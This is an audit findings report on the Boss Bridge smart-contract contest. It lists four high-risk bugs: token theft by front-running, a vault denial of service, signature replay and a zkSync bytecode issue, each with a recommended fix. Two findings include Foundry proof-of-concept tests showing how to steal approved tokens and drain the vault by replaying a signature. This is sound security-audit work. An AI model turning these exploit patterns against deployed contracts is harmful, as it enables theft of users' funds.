# First Flight #4: Boss Bridge - Findings Report

# Table of contents
- ## [Contest Summary](#contest-summary)
- ## [Results Summary](#results-summary)
- ## High Risk Findings
    - ### [H-01. depositTokensToL2 function allows stealing of tokens from owners who has approved L1BossBridge contract.](#H-01)
    - ### [H-02. Vault Token balance has potential of causing DOS when users are trying to lock Funds on layer1.](#H-02)
    - ### [H-03. Signature Replay Attack](#H-03)
    - ### [H-04. Unknown byte code at compile time](#H-04)




# <a id='contest-summary'></a>Contest Summary

### Sponsor: First Flight #4

### Dates: Nov 9th, 2023 - Nov 15th, 2023

[See more contest details here](https://codehawks.cyfrin.io/c/2023-11-Boss-Bridge)

# <a id='results-summary'></a>Results Summary

### Number of findings:
- High: 4
- Medium: 0
- Low: 0


# High Risk Findings

## <a id='H-01'></a>H-01. depositTokensToL2 function allows stealing of tokens from owners who has approved L1BossBridge contract.            



## Summary
Malicious actors can watch when a user `approve` bossbridge to spend his token and front-run depositTokensToL2 function which transfer the user funds to the address provided by the malicious users on layer1.
## Vulnerability Details
`depositTokensToL2` gives users the opportunity to determine whose account they want to spend the fund from and whose address they want to witdraw it to on layer2. A user who has given bossbridge allowance but yet to withdraw to layer2 or gave boss bridge infinity allowance will give a  malicious user opportunity to steal te useer funds by which he(malicious user) will specify the user address as the `from` parameter in the `depositTokensToL2` function to spend the user token and specify his(malicious user) address as the receiving address on layer2.
## Impact
1) A mev bot or an attacker has the potential of front running all users who have given bossbridge allowance and steal all their funds.
## Tools Used
manual review and foundry

## POC
```
function testAttackerCanstealApprovedTokensByOtherUsersAndDEposit() public {
        address attacker = makeAddr("attacker");
        vm.startPrank(user);
        uint256 amount = 10e18;
        token.approve(address(tokenBridge), amount);

        vm.expectEmit(address(tokenBridge));
        emit Deposit(user, attacker, amount);
        vm.stopPrank();
        //attacker front-run
        vm.prank(attacker);
        tokenBridge.depositTokensToL2(user, attacker, amount);

        assertEq(token.balanceOf(address(tokenBridge)), 0);
        assertEq(token.balanceOf(address(vault)), amount);
    }
```
`Add the test above to L1TokenBridge.t.sol and run forge t --mt testAttackerCanstealApprovedTokensByOtherUsersAndDEposit -vvvvv`
## Recommendations
The team should make sure it is only the user who approved the his token to bossbridge is able to deposit it to the contract.
``` diff
  function depositTokensToL2(
-       address from,
  
-         token.safeTransferFrom(from, address(vault), amount);
-         emit Deposit(from, l2Recipient, amount);


+         token.safeTransferFrom(msg.sender, address(vault), amount);
+         emit Deposit(msg.sender, l2Recipient, amount);


```
## <a id='H-02'></a>H-02. Vault Token balance has potential of causing DOS when users are trying to lock Funds on layer1.            



## Summary
The Token in Vault can be potentially stucked which can lead to a DOS for users who want to deposit on one layer to withdraw on another layer.
## Vulnerability Details
The logic in `depositTokensToL2` function checks that the vault won't exceed `100_000 ether` for a successful deposit to occur, but the total ampunt of token in circulation is `1_000_000 ether` which means there is possibility than a holder of the token can randomly send huge amount to the token to vault to halt deposit function.
## Impact
Users will be unable to depositToken on the affected chain and they won't be able to move their token to the desired chain which renders the protocol useless to users at that point in time.

The impact is medium because the likelihood of locking fund forever is low as an operator can sign a transaction to reduce the balance of the vault. 
## Tools Used
Manual Review.
## Recommendations
The BossBridge Team can declare a state variable that holds the total deposit made by users from bossbridge and check against the state variable during deposit to be sure it does not exceed `100_000 ether` , then add and deduct for a successful deposit and withdrawal respectively.
## <a id='H-03'></a>H-03. Signature Replay Attack            



## Summary
`sendToL1` function allows for a malicious user to replay the signature signed by an operator to keep withdrawing as long as the vault has enough funds.
## Vulnerability Details
The message hash generated by the operator by signing the message did not include a Nonce or refuse to check if such message has been executed. This omission allows the signature data to be used infinitely, enabling malicious user to withdraw funds limitlessly.
## Impact
malicious user is able to drain funds in the contract for as much as possible before the team will be able to pause the contract.
## Tools Used
foundry, manual review.
## POC
```
  function testUserCanWithdrawMultipleTokensWithOperatorSignature() public {
        //Adding an abitrary amount of token for vault to hold
        deal(address(token), address(vault), 1000e18);

        vm.startPrank(user);
        uint256 depositAmount = 10e18;
        uint256 userInitialBalance = token.balanceOf(address(user));

        token.approve(address(tokenBridge), depositAmount);
        tokenBridge.depositTokensToL2(user, userInL2, depositAmount);

        assertEq(token.balanceOf(address(vault)), (depositAmount + 1000e18));
        assertEq(
            token.balanceOf(address(user)),
            userInitialBalance - depositAmount
        );

        (uint8 v, bytes32 r, bytes32 s) = _signMessage(
            _getTokenWithdrawalMessage(user, depositAmount),
            operator.key
        );
        address attacker = makeAddr("attacker");

        for (uint i; token.balanceOf(address(vault)) > depositAmount; i++) {
            tokenBridge.withdrawTokensToL1(user, depositAmount, v, r, s);
            assertEq(
                token.balanceOf(address(user)),
                userInitialBalance + (depositAmount * i)
            );
        }

        assertLe(token.balanceOf(address(vault)), depositAmount);
    }
```
Add to L1TokenBridge.t.sol and run with `forge test --mt testUserCanWithdrawMultipleTokensWithOperatorSignature -vvvvvvvvvvv`

## Recommendations
it is advisable to the team to add nonce in the messages signed by the operator and also include a mapping that changes the status of the signature to executed the moment it is being executed by the users.
## <a id='H-04'></a>H-04. Unknown byte code at compile time            



## Summary
TokenFactory Contract is going to be deployed on zksync era and `deployToken` function takes in the bytes code of the contract to create as a parameter which can cause the token to not deploy correctly according to the intention of the developer.

## Vulnerability Details
According to zksyncera documentation state here (here)[https://era.zksync.io/docs/reference/architecture/differences-with-ethereum.html#create-create2] in order to guarantee the correctness of the contract to be created the bytes code of the contract must be known at compiled time because the way it calculate it's address is different from Ethereum virtual machine but the bytes code at the compile timr for create Token function is passed asn an arguement to the contract which can make the deployment of a token to not function correctly since the compiler is not aware of the bytes code involve.
## Impact
Wrong creation of Token on zksync era
## Tools Used
Manual Review
## Recommendations
The team should import the bytescode of the token needed to be deployed in tokenfactory.sol so that it can be known at the compile time and deploying it on zksync era will not have any suspicious issue.
    





